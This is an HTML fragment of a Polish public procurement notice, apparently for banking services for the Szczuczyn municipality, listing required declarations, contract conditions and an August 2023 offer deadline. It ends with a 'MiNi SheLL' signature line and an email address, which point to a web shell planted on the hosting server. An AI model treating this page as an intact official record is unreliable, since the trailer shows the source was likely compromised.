SWZ (Załącznik nr<br/>3 do SWZ) oświadczenia, dotyczącego podwykonawcy niebędącego podmiotem udostępniającym zasoby, w zakresie podstaw<br/>wykluczenia, o których mowa w art. 108 ust.1 ustawy Pzp.<br/>5. UWAGA! Oświadczenia, o których mowa powyżej należy złożyć, pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej<br/>kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia spełniania przez Wykonawcę warunku udziału w<br/>postępowaniu dotyczącego uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w<br/>Rozdziale 5 ust. 2 pkt 2) niniejszej SWZ:<br/>zezwolenie Komisji Nadzoru Finansowego na rozpoczęcie działalności bankowej, o którym mowa w art. 36 ustawy z dnia 29 sierpnia<br/>1997 r. Prawo bankowe (tj. Dz.U. z 2020 r., poz. 1896 ze zm.) lub inny<br/>dokument, na podstawie którego prowadzona jest działalność bankowa w zakresie przedmiotu niniejszego zamówienia, zgodnie z<br/>przepisami Prawa bankowego. W przypadku Wykonawców wspólnie składających ofertę dokument składa ten z Wykonawców, który<br/>zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>1) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2021r. poz. 275), z innym Wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej<br/>grupy kapitałowej – wzór oświadczenia<br/>stanowi załącznik nr 5 do SWZ; W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa<br/>każdy Wykonawca wspólnie ubiegający się o udzielenie zamówienia.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zapisy określono w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/um_szczuczyn</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-31 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com